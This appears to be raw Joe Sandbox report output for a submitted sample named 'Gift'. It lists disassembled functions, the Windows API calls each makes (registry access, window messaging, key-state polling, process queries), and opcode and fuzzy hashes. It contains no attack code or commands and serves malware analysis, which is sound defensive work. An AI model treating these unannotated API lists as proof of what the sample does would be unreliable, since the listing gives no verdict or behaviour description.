                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                          • String ID: %lu
                                                                          • API String ID: 3164766367-685833217
                                                                          • Opcode ID: cef89fba41d354a3054d6c9564280d7c7694c5431db2217b8a79dfab97939e52
                                                                          • Instruction ID: 0bf7c6a42f115ebdd286820714561d6f050e4b4484b00c847b562deb3d6da377
                                                                          • Opcode Fuzzy Hash: cef89fba41d354a3054d6c9564280d7c7694c5431db2217b8a79dfab97939e52
                                                                          • Instruction Fuzzy Hash: 86219034A00108AFCB11EF65C885DAEB7B8EF49704F108469F905DB352DB71EE15CB61
                                                                          Function 0032AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                            • Part of subcall function 0032AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0032AA6F
                                                                            • Part of subcall function 0032AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0032AA82
                                                                            • Part of subcall function 0032AA52: GetCurrentThreadId.KERNEL32 ref: 0032AA89
                                                                            • Part of subcall function 0032AA52: AttachThreadInput.USER32(00000000), ref: 0032AA90
                                                                          • GetFocus.USER32 ref: 0032AC2A
                                                                            • Part of subcall function 0032AA9B: GetParent.USER32(?), ref: 0032AAA9
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0032AC73
                                                                          • EnumChildWindows.USER32(?,0032ACEB), ref: 0032AC9B
                                                                          • __swprintf.LIBCMT ref: 0032ACB5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                          • String ID: %s%d
                                                                          • API String ID: 1941087503-1110647743
                                                                          • Opcode ID: ea87f62e144329da93fab843c2add2e3908fcb1b224590e20903717cf6ff817b
                                                                          • Instruction ID: 1f929db8b4e95c5a2071db959241cc396910006c7473901084962e0dab9da375
                                                                          • Opcode Fuzzy Hash: ea87f62e144329da93fab843c2add2e3908fcb1b224590e20903717cf6ff817b
                                                                          • Instruction Fuzzy Hash: A711E174600625ABDF16BFA0ED86FEA77BCEF44300F008075FE08AA142DAB05955CBB1
                                                                          Function 003322E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00332318
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                          • API String ID: 3964851224-769500911
                                                                          • Opcode ID: d50726884fc9c77ea7d796bb43116350ab95ab0673a4c464c81ea19637568e5c
                                                                          • Instruction ID: 7c693b23c272839a8f0076ec6bea885b44f88f628ba7397538cf27ee7398dc31
                                                                          • Opcode Fuzzy Hash: d50726884fc9c77ea7d796bb43116350ab95ab0673a4c464c81ea19637568e5c
                                                                          • Instruction Fuzzy Hash: E5115A3895021D9BDF01EF94D8914BEB3B8FF19344F5084A9D811A7262EB365D1ACF40
                                                                          Function 0034F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0034F2F0
                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0034F320
                                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0034F453
                                                                          • CloseHandle.KERNEL32(?), ref: 0034F4D4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                          • String ID:
                                                                          • API String ID: 2364364464-0
                                                                          • Opcode ID: 4f28ce09d090a72be4dd36f180ed1fab0d8a161f0dab5272f521e1fdfb785eb3
                                                                          • Instruction ID: 40eff799b08ec03555ef4c3e0914b020db2fed8a28a1e4a57eaeacc3069a166a
                                                                          • Opcode Fuzzy Hash: 4f28ce09d090a72be4dd36f180ed1fab0d8a161f0dab5272f521e1fdfb785eb3
                                                                          • Instruction Fuzzy Hash: 6C8190716103009FD721EF28D886B2AB7E5AF48714F14891EF999DB392DBB0AD508F91
                                                                          Function 00350697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0035147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0035040D,?,?), ref: 00351491
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0035075D
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0035079C
                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003507E3
                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 0035080F
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0035081C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                          • String ID:
                                                                          • API String ID: 3440857362-0
                                                                          • Opcode ID: 0cec77c6acd8b38ab8dffa6884f05fc417679b6d49bcaec80e0e5fca95f7cdd0
                                                                          • Instruction ID: f6587539618d64c4e99c57474fa37615c302c9a65f68e69b614d843a4e08a294
                                                                          • Opcode Fuzzy Hash: 0cec77c6acd8b38ab8dffa6884f05fc417679b6d49bcaec80e0e5fca95f7cdd0
                                                                          • Instruction Fuzzy Hash: 34516A71218244AFC709EF64C881F6AB7E9BF88305F04892DF995872A1DB71E918CF52
                                                                          Function 0033EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0033EC62
                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0033EC8B
                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0033ECCA
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0033ECEF
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0033ECF7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 1389676194-0
                                                                          • Opcode ID: 0df9ba0d79cb6aad88038d4640322911fd9e19b6c74fcd5474dc7fcddc203cf8
                                                                          • Instruction ID: d8e15d0e1c516dd49b5828edc42284abd785151c4f9cf74bcfc078fd836c5d71
                                                                          • Opcode Fuzzy Hash: 0df9ba0d79cb6aad88038d4640322911fd9e19b6c74fcd5474dc7fcddc203cf8
                                                                          • Instruction Fuzzy Hash: 18513935A10109DFCB05EF64C985AAEBBF5EF08314F148499E849AB3A2CB31ED61DF50
                                                                          Function 0035A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bee4f7fde7b1b89b40a6a6da15b58ddd4643a1598f042e201ee555a91d917107
                                                                          • Instruction ID: f9d19e3567c4c197d36693c681cb467bb45c4d7649dfeaaffa5d2cd15f495602
                                                                          • Opcode Fuzzy Hash: bee4f7fde7b1b89b40a6a6da15b58ddd4643a1598f042e201ee555a91d917107
                                                                          • Instruction Fuzzy Hash: B7410635904504AFD712CBA4CC89FAABBB8EB0D312F164265FC16A72F1C7709E05EA61
                                                                          Function 002D2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 002D2727
                                                                          • ScreenToClient.USER32(003977B0,?), ref: 002D2744
                                                                          • GetAsyncKeyState.USER32(00000001), ref: 002D2769
                                                                          • GetAsyncKeyState.USER32(00000002), ref: 002D2777
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                          • String ID:
                                                                          • API String ID: 4210589936-0
                                                                          • Opcode ID: 1263b8823ce647b018fb86b8abd74056a8399cf3426c566b77f5d60eacb7bf48
                                                                          • Instruction ID: fbf0c2e14f26acb27ff9cc20b4beb45b6508bdff3fca7d7098ad954547f8c8ef
                                                                          • Opcode Fuzzy Hash: 1263b8823ce647b018fb86b8abd74056a8399cf3426c566b77f5d60eacb7bf48
                                                                          • Instruction Fuzzy Hash: BE416D35524109FBDF2A9F68C844AE9FB74FB15324F10835AF829962E0C734ADA4DF91
                                                                          Function 003295D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 003295E8
                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00329692
                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0032969A
                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 003296A8
                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003296B0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostSleep$RectWindow
                                                                          • String ID:
                                                                          • API String ID: 3382505437-0
                                                                          • Opcode ID: 2cac497ddb2c5828a754ddb6eabe4640ccc69e773e5b850f6f62b152e0f59701
                                                                          • Instruction ID: c0fe8ca5bdce05b42d8799bd2abbac21b3ce9bd70843544f58aa6a7a915dd3c5
                                                                          • Opcode Fuzzy Hash: 2cac497ddb2c5828a754ddb6eabe4640ccc69e773e5b850f6f62b152e0f59701
                                                                          • Instruction Fuzzy Hash: 2331C071500229EFDB15CF68ED4DB9E7BB9FB45325F11821AF924AB1D0C3B09924DB90
                                                                          Function 0035B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0035B804
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0035B829
                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0035B841
                                                                          • GetSystemMetrics.USER32(00000004), ref: 0035B86A
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0034155C,00000000), ref: 0035B888
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$MetricsSystem
                                                                          • String ID:
                                                                          • API String ID: 2294984445-0
                                                                          • Opcode ID: 6e76bdb8796aea0344402c510d7e42da373ed4b45a798c95df178e5bf761015b
                                                                          • Instruction ID: 128cb2996386876adab02f5714f3f4c509a85a40f27caadc9288e74f767152d4
                                                                          • Opcode Fuzzy Hash: 6e76bdb8796aea0344402c510d7e42da373ed4b45a798c95df178e5bf761015b
                                                                          • Instruction Fuzzy Hash: 2C219131918265AFCB169F38CC09E6A7BA8FB05726F114729FD26D21F0D7709814CB90
                                                                          Function 00346138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindow.USER32(00000000), ref: 00346159
                                                                          • GetForegroundWindow.USER32 ref: 00346170
                                                                          • GetDC.USER32(00000000), ref: 003461AC
                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 003461B8
                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 003461F3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ForegroundPixelRelease
                                                                          • String ID:
                                                                          • API String ID: 4156661090-0
                                                                          • Opcode ID: 4f1b8f5a4da1a96af8391cd6d2a5faf32253b1c05a8ec1159d1510003e5a3f1e
                                                                          • Instruction ID: 8787d36751e260bc3c9335a58d97ee565094d9b9a708f0b662af7eb755edd960
                                                                          • Opcode Fuzzy Hash: 4f1b8f5a4da1a96af8391cd6d2a5faf32253b1c05a8ec1159d1510003e5a3f1e
                                                                          • Instruction Fuzzy Hash: A221A475A002049FD705EF65DD85A6AB7F9EF49311F04C479F84A97362CA70BC00CB90
                                                                          Function 002D16CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002D1729
                                                                          • SelectObject.GDI32(?,00000000), ref: 002D1738
                                                                          • BeginPath.GDI32(?), ref: 002D174F
                                                                          • SelectObject.GDI32(?,00000000), ref: 002D1778
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                          • String ID:
                                                                          • API String ID: 3225163088-0
                                                                          • Opcode ID: fada9887d9d92f15919696738028bda6c56e342b04c763d59694884efc3bed37
                                                                          • Instruction ID: 716138f48cb44955b63c1c31bd571da44d3359998c90d48b2ea86a744c544cac
                                                                          • Opcode Fuzzy Hash: fada9887d9d92f15919696738028bda6c56e342b04c763d59694884efc3bed37
                                                                          • Instruction Fuzzy Hash: 1E217430528209FBEB129F28DD4A7A97BADFB00311F148217F815966F0D7B29DB1CB90
                                                                          Function 0032C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID:
                                                                          • API String ID: 2931989736-0
                                                                          • Opcode ID: 31d76904bbb4853c147f6767b3e1dc2ea9bff08732a57183e739b04e704d6a0c
                                                                          • Instruction ID: 213cca13a921da2190894d53f37044ae490567488855ab9aade812ef255ceb5a
                                                                          • Opcode Fuzzy Hash: 31d76904bbb4853c147f6767b3e1dc2ea9bff08732a57183e739b04e704d6a0c
                                                                          • Instruction Fuzzy Hash: 92019272A601297BD216A511AC82FFFA36C9E603D4B05C135FE0697746E760DE2586E0
                                                                          Function 0033504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00335075
                                                                          • __beginthreadex.LIBCMT ref: 00335093
                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 003350A8
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003350BE
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003350C5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                          • String ID:
                                                                          • API String ID: 3824534824-0
                                                                          • Opcode ID: 5ec43a4198a4a93dd9be61bdbb5b261ece1722eb61e986f0b49043a68e3ac251
                                                                          • Instruction ID: 39c15e81004566bbf057e452d55529243e486bd608a0cf0a4ce41181926ef2a9
                                                                          • Opcode Fuzzy Hash: 5ec43a4198a4a93dd9be61bdbb5b261ece1722eb61e986f0b49043a68e3ac251
                                                                          • Instruction Fuzzy Hash: 6B110876928609BBC7079BA89C48A9B7BACEB46320F144256F814D3390D6B2890487F0
                                                                          Function 00328E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00328E3C
                                                                          • GetLastError.KERNEL32(?,00328900,?,?,?), ref: 00328E46
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00328900,?,?,?), ref: 00328E55
                                                                          • HeapAlloc.KERNEL32(00000000,?,00328900,?,?,?), ref: 00328E5C
                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00328E73
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 842720411-0
                                                                          • Opcode ID: 3fb8a76332208e496ed7bde6f4250c31c04607b21556322a780cf635735af6ff
                                                                          • Instruction ID: e32e3894d5016735f2153943e6be86cc54b8a9073be520ce9406a6421ae6027d
                                                                          • Opcode Fuzzy Hash: 3fb8a76332208e496ed7bde6f4250c31c04607b21556322a780cf635735af6ff
                                                                          • Instruction Fuzzy Hash: A6018174201214BFDB264FA5EC4DD6B7FBDEF8A355B114929F849C2220DBB19C10CAA0
                                                                          Function 003357FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0033581B
                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00335829
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00335831
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0033583B
